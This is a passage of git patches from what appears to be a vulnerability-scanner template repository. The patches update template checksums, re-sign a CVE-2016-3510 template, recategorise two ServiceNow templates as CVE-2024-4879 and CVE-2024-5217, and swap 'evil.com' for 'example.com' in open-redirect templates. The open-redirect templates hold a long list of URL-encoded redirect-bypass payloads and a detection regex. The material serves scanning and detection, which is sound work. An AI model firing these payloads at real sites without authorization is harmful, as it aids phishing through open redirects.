-http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:8ca17c97d735ad2268e33e16d0eb4e100a8a36e5 +http/technologies/wordpress/plugins/post-smtp.yaml:fddc9265dbac8f29297af8e42c4b29257057ef0d +http/technologies/wordpress/plugins/post-types-order.yaml:30618215e9436e474b303ce6123072fc0a25415f +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:3ef0c5dd20061f1cfb725c0175608e2ad97269b9 +http/technologies/wordpress/plugins/pretty-link.yaml:7a7b3009b1bcaef0720f456e929205a26a9eca12 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:5f3ccc944ece32f3a74c663511ef6e2ad5b5cc06 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:28a510d91063cbf448f4a7f3ff05c48e7d29f274 +http/technologies/wordpress/plugins/redirection.yaml:bbee99349e652033442b252df4b900e3b7de0c7b +http/technologies/wordpress/plugins/redux-framework.yaml:4a79aa8eae76efc34caf3fad1bad3e52279976fe +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:321d87ae2bf25df84e3d075bc9865ce8b3dc0d7b +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:806af87fd259f70b64aa968746dc87d4d576683e +http/technologies/wordpress/plugins/safe-svg.yaml:ab3a8fd74ac1b1074531993b5f5904db4ede2bfd +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d2b420be6a097d617009fb6bc2b9c8ca0fef557b +http/technologies/wordpress/plugins/sg-cachepress.yaml:b1f8c40933584facab7bfdb74878fcc2e4accafc +http/technologies/wordpress/plugins/sg-security.yaml:db3eb642dd0e02addba6fdff82b799c3d03314f4 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0a2be68100f2d14eab2499c58052ffd0338036b8 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:cf51d663fc97c00064c9d4d7168f82b80c7435a0 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:b01e8335d22518a304230a593f02335a18390170 +http/technologies/wordpress/plugins/simple-history.yaml:c1067f5e5c379ef56fb7dd734a3c6e61ad40ab59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:e6c358b461142ab273f0ff4ffd8003e1de848f39 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:18ed50f702cb83d9d459dba235ea971c9c95cdcc +http/technologies/wordpress/plugins/smart-slider-3.yaml:dfe98f15e3170bde327f6c0b4d09d80d8788dbeb +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:b93bafc4b34de6321fe93bff85acc141c982819c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:beb358be45eebcf972e6542fc75270a7f8f4faa3 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:382da7b0f6a776c681fb8145d741a5452be0d792 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:1f822d55c263f588ac3c85baf23b50b27f657f10 +http/technologies/wordpress/plugins/svg-support.yaml:aa8f9f1cb7811901504546d5f6caaf01e61eec88 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e400c1d71b020b7e96fea574923d8e6d07533a97 +http/technologies/wordpress/plugins/tablepress.yaml:ba828a2178b8cdc2ab77a37c02314e73bc4958a4 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:7dd0b07fa6a1453f94ca15f98fa5ec93e62dde66 +http/technologies/wordpress/plugins/templately.yaml:1bedd3aefeaa1e1c4f396be20901cd901958dace +http/technologies/wordpress/plugins/the-events-calendar.yaml:6ac5ddb0a7deb1e3b8e8de2eadd35454d87cd772 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:14c1ef3e1593c7a677486bb810603e676c46d33f +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:436df5e046c2ddcdf342c7eb550d02a06ac081cc +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:609d1ca0f93e375fb88b674e317dc57b5569f39f +http/technologies/wordpress/plugins/under-construction-page.yaml:6703c7c6e52a802600f52296d44136383d4e0052 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:96fc0a0f004ecf329d24e1579cbe3b8dd38ed3ff http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:6d2ab7874805973ff7869f2f9eead7b0787bb0d5 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:f9ec60f147849303c42cd383b84ffc16aa75936f +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:b5ea5547b5af657cdc068ce6bc2e36b6a229b11a +http/technologies/wordpress/plugins/webp-express.yaml:cf5ad7fda4091a4d782a0cef89380fde88875f82 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:e605cc8b705a846116ae092ffdc1320f11a50c4b +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:40645ae5f4ad0ccf782240628116652ca4374b45 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:2861f56bcb6f178cffa56d61eb4ca64b61ff1302 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:8779a13616a1ec4a46a15c8b86a7102071d465a4 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:ff7313cff92fb3994e46bff34f31e12c4cf07561 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:7d28402e26f2398873558096a922eb777ca1e76d +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3185825e0f5b30dfbb9bf0f6190f880ed6b702ec +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:3a93960632c440143b30c46280f69dc8c2da1efe +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:7f5dbd6188afdb9479ac5fbb17d760da0657fb18 +http/technologies/wordpress/plugins/woocommerce-services.yaml:ff55ec8d4fc0670c8d88feb3e4cb19ec6d20faca +http/technologies/wordpress/plugins/woocommerce.yaml:cb46f349a805856ba4cb2fd0d2f0db88c439e97b +http/technologies/wordpress/plugins/wordfence.yaml:d98dba70ddd69d8c312bfe65419986a5d35bc221 +http/technologies/wordpress/plugins/wordpress-importer.yaml:4fb2dd763fe733091712ee2792b7b841208d2277 +http/technologies/wordpress/plugins/wordpress-seo.yaml:71ee2c058c37d7e402559bf8cf300574ddf86fa3 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:d02db272086cf3ccfcce4e2a1ea3a2837ca55ccf +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:27dd704b97611487edefa3a2adb2e25f144785df +http/technologies/wordpress/plugins/wp-file-manager.yaml:ed45c111d8ec0dd9e87ebd2378a6ef7287f7830a +http/technologies/wordpress/plugins/wp-google-maps.yaml:575f9cea92b315b9b4f6f03fd6aa2de3623c9c79 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:18807172f174731c819d8606f4efe66a54b7db74 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:661dc3f38e9fd5b13db10c246089c997cdaeb550 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:165e9f8c1273a6188d1e1037f0ee82d056c7df57 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:62e086c85a88a4646e336d3927159bfa10867287 +http/technologies/wordpress/plugins/wp-optimize.yaml:30d46f826fde3770066331d3a29cfa75181c6711 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:b2a8b79afd40bd54121b36e8f27c16dcab026de5 +http/technologies/wordpress/plugins/wp-reset.yaml:f597c7d2ce59b9a1fcb23cdd871f96184c112184 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:237054db5866dc14de8bead8745429893c81e797 +http/technologies/wordpress/plugins/wp-rollback.yaml:90c3b49e657c1186a109f599e81cbbb9d145f860 +http/technologies/wordpress/plugins/wp-seopress.yaml:89f57653f4a2b8c388e5583863f9ae7dd5b91c0e +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:3a01c2506c1928baab1ad3a3964aea517cd6384c +http/technologies/wordpress/plugins/wp-smushit.yaml:0b579d41eaacb3c8953c63481e8bbde1e16bc89b +http/technologies/wordpress/plugins/wp-statistics.yaml:f70622472d4c3f837406a2d98043dd23c444025e +http/technologies/wordpress/plugins/wp-super-cache.yaml:416a9b4fbdf72f1ec1e69ac39d996118a85acce7 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a81303e83900e1d4834034539c46cb1f0bcfe2b0 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:c49c55740439ac30aae04f3e24c46b258be99a56 +http/technologies/wordpress/plugins/wpforms-lite.yaml:9bfdfed939246d7b7acb5152b55caed5e3162ee5 +http/technologies/wordpress/plugins/wps-hide-login.yaml:b2674656f7f2c54296993ef6903f34a2b8b58c77 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:89a656ce74ee54465ca91c3e3b9dae6d03c76c60 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:adb615b4e31cd30133a82da5c23bbdd8bb818863 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8695,7 +8695,7 @@ network/cves/2001/CVE-2001-1473.yaml:febab57b73d417adcee7535327476a56b072adb4 network/cves/2011/CVE-2011-2523.yaml:39eba544ecf40cd742e5042c18c9f28b07d73c58 network/cves/2015/CVE-2015-3306.yaml:9f687f191fa20b97861ec04cb5acfe798248f611 network/cves/2016/CVE-2016-2004.yaml:19c23411a63774a87b8e604d0bf08fe083eb1614 -network/cves/2016/CVE-2016-3510.yaml:f535d7959e2f7afcde395f448e5ea93d8e49fd6d +network/cves/2016/CVE-2016-3510.yaml:e467641144cd548948ef78b7e95ae2d692f0362a network/cves/2017/CVE-2017-3881.yaml:b814b5ded3051d4eaec01c4a486fac3ac4abffa7 network/cves/2017/CVE-2017-5645.yaml:693cc474f86c8081efc4e66545dc41a046fe2a5a network/cves/2018/CVE-2018-2628.yaml:c1e2d99c2938bf24dbc6d38523702fc408b1472a @@ -8867,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4193ef091c7925f655faf0f4762ae8c78c13fc1d +templates-checksum.txt:b748c4b3a95fd74ac14a2b627b759eba660f41ad wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a46f3b2268822b358e2520eea3ee84e716e6c0de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:47:01 +0000 Subject: [PATCH 051/247] Auto Template Signing [Thu Jul 11 07:47:01 UTC 2024] :robot: --- network/cves/2016/CVE-2016-3510.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 9cdd02fbccf..135b08938d1 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -54,4 +54,4 @@ tcp: part: interactsh_protocol words: - "dns" -# digest: 4b0a004830460221008d2606c39e5ea4351864ef8062f319aec1821364ae05e12d4a6867a0849c930e022100c7edf99ab68a3c8ede7cbdecae0b8d1516e23763e7df36b3baf2418063aa343b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220249734c4ffaf01327913e598f9c62ff98446ffee85dcdfdb4af8dfb53fe03782022100be0f48fd1c9ffe208aa0dd7ab36cccf7983c13eb3c4d75cb85b7e5573f2b5199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ef3f373a4855c379c4d54c157716180620470583 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:17:23 +0530 Subject: [PATCH 052/247] Update and rename http/misconfiguration/servicenow-ssti.yaml to http/cves/2024/CVE-2024-4879.yaml --- .../2024/CVE-2024-4879.yaml} | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) rename http/{misconfiguration/servicenow-ssti.yaml => cves/2024/CVE-2024-4879.yaml} (50%) diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/cves/2024/CVE-2024-4879.yaml similarity index 50% rename from http/misconfiguration/servicenow-ssti.yaml rename to http/cves/2024/CVE-2024-4879.yaml index e6b547a56fb..0cd1ae0f3c7 100644 --- a/http/misconfiguration/servicenow-ssti.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -1,20 +1,22 @@ -id: servicenow-ssti +id: CVE-2024-4879 info: - name: Service Now - Template Injection Mitigation Bypass + name: Jelly Template Injection Vulnerability in ServiceNow UI Macros author: DhiyaneshDk - severity: high + severity: critical + description: | + ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - classification: - cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154 metadata: verified: true max-request: 1 vendor: servicenow product: servicenow shodan-query: - - http.favicon.hash:1701804003 + - http.favicon.hash:"1701804003" - http.title:"servicenow" fofa-query: - icon_hash=1701804003 From 48d666905a4ebbced75d28db1f54b3004c769cf3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:19:39 +0530 Subject: [PATCH 053/247] add author name --- http/cves/2024/CVE-2024-4879.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 0cd1ae0f3c7..1f8343fa62b 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -2,7 +2,7 @@ id: CVE-2024-4879 info: name: Jelly Template Injection Vulnerability in ServiceNow UI Macros - author: DhiyaneshDk + author: DhiyaneshDk,ritikchaddha severity: critical description: | ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. From 0e295cf703b60e37d056c720216b5f4cfe13a5fb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:24:04 +0530 Subject: [PATCH 054/247] minor-update --- .../2024/CVE-2024-5217.yaml} | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) rename http/{misconfiguration/servicenow-filesystem-bypass.yaml => cves/2024/CVE-2024-5217.yaml} (55%) diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/cves/2024/CVE-2024-5217.yaml similarity index 55% rename from http/misconfiguration/servicenow-filesystem-bypass.yaml rename to http/cves/2024/CVE-2024-5217.yaml index ff155f4152c..998cff4b47c 100644 --- a/http/misconfiguration/servicenow-filesystem-bypass.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -1,20 +1,22 @@ -id: servicenow-filesystem-bypass +id: CVE-2024-5217 info: - name: Service Now - Filesystem Filter Bypass - author: DhiyaneshDk - severity: high + name: ServiceNow Incomplete Input Validation in GlideExpression Script + author: DhiyaneshDk,ritikchaddha + severity: critical + description: | + ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - classification: - cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313 metadata: verified: true max-request: 1 vendor: servicenow product: servicenow shodan-query: - - http.favicon.hash:1701804003 + - http.favicon.hash:"1701804003" - http.title:"servicenow" fofa-query: - icon_hash=1701804003 From 7cc2da843fe8b8794031ece43253e93463fe8a4d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Thu, 11 Jul 2024 12:02:28 +0200 Subject: [PATCH 055/247] Using different URL as we don't know who evil.com is controlled by --- .../redirect/open-redirect.yaml | 6 +- .../generic/open-redirect-generic.yaml | 188 +++++++++--------- 2 files changed, 97 insertions(+), 97 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 736d0bd7c14..47d693a75aa 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -16,7 +16,7 @@ http: payloads: redirect: - - "evil.com" + - "example.com" fuzzing: - part: query @@ -174,11 +174,11 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 - type: status status: - 301 - 302 - 307 -# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index 10879db2926..dbb5973f19f 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -20,99 +20,99 @@ http: payloads: redirect: - - '%0a/evil.com/' - - '%0d/evil.com/' - - '%00/evil.com/' - - '%09/evil.com/' - - '%5C%5Cevil.com/%252e%252e%252f' - - '%5Cevil.com' - - '%5cevil.com/%2f%2e%2e' - - '%5c{{RootURL}}evil.com/%2f%2e%2e' - - '../evil.com' - - '.evil.com' - - '/%5cevil.com' - - '////\;@evil.com' - - '////evil.com' - - '///evil.com' - - '///evil.com/%2f%2e%2e' - - '///evil.com@//' - - '///{{RootURL}}evil.com/%2f%2e%2e' - - '//;@evil.com' - - '//\/evil.com/' - - '//\@evil.com' - - '//\evil.com' - - '//\tevil.com/' - - '//evil.com/%2F..' - - '//evil.com//' + - '%0a/example.com/' + - '%0d/example.com/' + - '%00/example.com/' + - '%09/example.com/' + - '%5C%5Cexample.com/%252e%252e%252f' + - '%5Cexample.com' + - '%5cexample.com/%2f%2e%2e' + - '%5c{{RootURL}}example.com/%2f%2e%2e' + - '../example.com' + - '.example.com' + - '/%5cexample.com' + - '////\;@example.com' + - '////example.com' + - '///example.com' + - '///example.com/%2f%2e%2e' + - '///example.com@//' + - '///{{RootURL}}example.com/%2f%2e%2e' + - '//;@example.com' + - '//\/example.com/' + - '//\@example.com' + - '//\example.com' + - '//\texample.com/' + - '//example.com/%2F..' + - '//example.com//' - 